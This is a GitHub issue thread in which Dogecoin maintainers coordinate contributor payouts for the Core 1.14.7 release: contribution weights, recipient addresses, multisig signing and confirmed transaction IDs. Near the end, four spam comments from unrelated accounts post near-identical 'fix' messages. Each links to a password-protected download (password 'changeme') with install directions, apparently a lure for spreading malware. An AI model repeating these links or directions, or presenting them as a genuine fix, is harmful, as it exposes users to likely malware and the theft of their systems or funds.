### ISSUE TITLE
Payout for Dogecoin Core 1.14.7 release

### ISSUE THREAD

**Issue by chromatic** [dogecoinfoundation/corefunds#24]
Per my reading of the policy document, the 1.14.7 release has met the threshold for contributor payouts. What do we need to do to make this happen?

I believe it's:

- at least 2 other signers agree
- collect a list of contributions
- evaluate the contribution weights
- collect addresses from contributors
- create, sign, and submit the transaction

**Comment by patricklodder** [comment]
I have been working on the weights, not fully done yet but am at 95%. Was planning to post it in discussions on the main repo again. Is that ok?

**Comment by rnicoll** [comment]
Just commenting to say I'm out here and following, a list of weighted contributions would definitely help. Do we have better transaction builders than last time or should I be getting mine set up?

**Comment by marshallhayner** [comment]
Let me know if anything is needed from my end.

Sincerely,
*Marshall Hayner*
( https://www.metalpay.com ) ( https://www.facebook.com/marshall.hayner ) ( https://www.twitter.com/marshallhayner ) ( https://www.linkedin.com/in/marshallhayner/ )

Sent via Superhuman ( ***@***.*** )

**Comment by chromatic** [comment]
@patricklodder posting a discussion on the main repo sounds great!

@rnicoll I'm not aware of any better transaction tools. If you don't mind setting yours up, that'd be great.

@marshallhayner warm up your private key perhaps? I'll do the same. I'd like to know which three of us should sign (and we have to get the order correct, as we all know).

**Comment by patricklodder** [comment]
Weights proposed here: https://github.com/dogecoin/dogecoin/discussions/3505

**Comment by rnicoll** [comment]
I'll try to get tooling up and transactions built this week. The tooling should be order-agnostic, and be able to merge everyone's signatures independently.

Everyone will need a synced Dogecoin Core 1.21, as it has the RPC support for these transactions, so that's probably the main thing to check meanwhile.

**Comment by rnicoll** [comment]
Correction: I believe only I need a synced client, to generate the raw transaction. Signing does not require the client to be synced.

**Comment by rnicoll** [comment]
I've taken a look at the weightings, seems reasonable at first glance. Is someone able to pull together addresses for participants?

My node keeps running out of disk space, but I'll have a fully synced node soon!

**Comment by rnicoll** [comment]
To make this clear - if anyone has any concerns with the proposed list in https://github.com/dogecoinfoundation/corefunds/issues/24#issuecomment-2030304194 please let us know, but as far as I am aware there are no objections.

My node was not synced, that's fixed, and I've found the transaction builder. If a list of addresses can be acquired, I can build the transaction and send around for signing.

**Comment by chromatic** [comment]
:+1: from me on the list of contributions and weights. Who has contact information from last time?

**Comment by rnicoll** [comment]
I've checked, I don't think I have contact details any more. I'll can see who has addresses listed on GitHub, over the weekend, but obviously if we can get new addresses that's better.

**Comment by rnicoll** [comment]
ajaxpop, alamshafil, chromatic, martyornot and mishaboar have public addresses. edtubbs, michilumin and xanimo I have contact with on Discord, should be able to get addresses there.

Patrick, if I send you the list so far, can you collate with any addresses you know? That also solves the problem of getting your address. I also have total weightings based on the link above, in that sheet.

**Comment by rnicoll** [comment]
ajaxpop, alamshafil, chromatic, martyornot and mishaboar have public addresses.

I'm trying to recall exactly who gets payouts, can I confirm my understanding from https://github.com/dogecoinfoundation/corefunds/blob/main/POLICY.md that item 3 reflect ownership of the funds, payouts are still due to the keyholders?

Patrick, if I send you the list so far, can you collate with any addresses you know? That also solves the problem of getting your address. I also have total weightings based on the link above, in that sheet.

**Comment by patricklodder** [comment]
> I'm trying to recall exactly who gets payouts

All listed contributors.

>  item 3 reflect ownership

That's what I intended with that, yes.

> if I send you the list so far, can you collate with any addresses you know?

I don't know of any current receiving addresses - the last round I did was in 2021 iirc, that's 2.5 years ago - other than the ones you listed, but I can reach out and find out. Warning: I'm on the road for a week and a bit so I will not be fast.

**Comment by rnicoll** [comment]
List I have sent to the last address I have for Patrick, and... well it hasn't bounced so far, at least!

**Comment by daank-c** [comment]
hey guys,

curious what the status is on this. am also wondering if there's anything I can do to help move it along!

cheers

**Comment by patricklodder** [comment]
Thanks for the reminder. I'll send my collected info to Ross as I meant to do that a few weeks ago, but I got 2 more responses while I was writing and signing the list - and then forgot to do it after re-processing.

**Comment by rnicoll** [comment]
Acknowledging this is currently with me, I've pulled together both address sheets and am just double checking the payout amounts before I formally propose them.

**Comment by daank-c** [comment]
Awesome, thanks for doing this guys!

**Comment by rnicoll** [comment]
Transactions signed, confirmed and relayed:

* a27c520406f8e726b436b8e0dd25102949ddd6afff8e560cc1ff33be6eefb5a7
* 75da97dcc68432aa3ed0971b53d3b3a6df4cd972d7ffd29b7c4a51055d3e4d5f
* c79e6fdb68c710f7406b5ac445b77f437c0297307f568974381f268a71fbcef3

I'll have a reddit post up later today.

**Comment by rnicoll** [comment]
https://www.reddit.com/r/dogecoindev/comments/1eosm3w/dogecoin_core_1147_tip_jar_payouts/

**Comment by patricklodder** [comment]
I think that that payout is not related to this repo tho?

**Comment by rnicoll** [comment]
Good point, I've rolled both into this discussion. For corefunds the email with initial transaction is out, although not sure if it's been relayed to chromatic, and as I now have chromatic's email I should do that myself.

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by nothingspecialreally** [comment]
Hello all! Just wondering if there are any updates or there's anything we can do to help out.

**Comment by 0foxes** [comment]
Hey everyone, any updates?
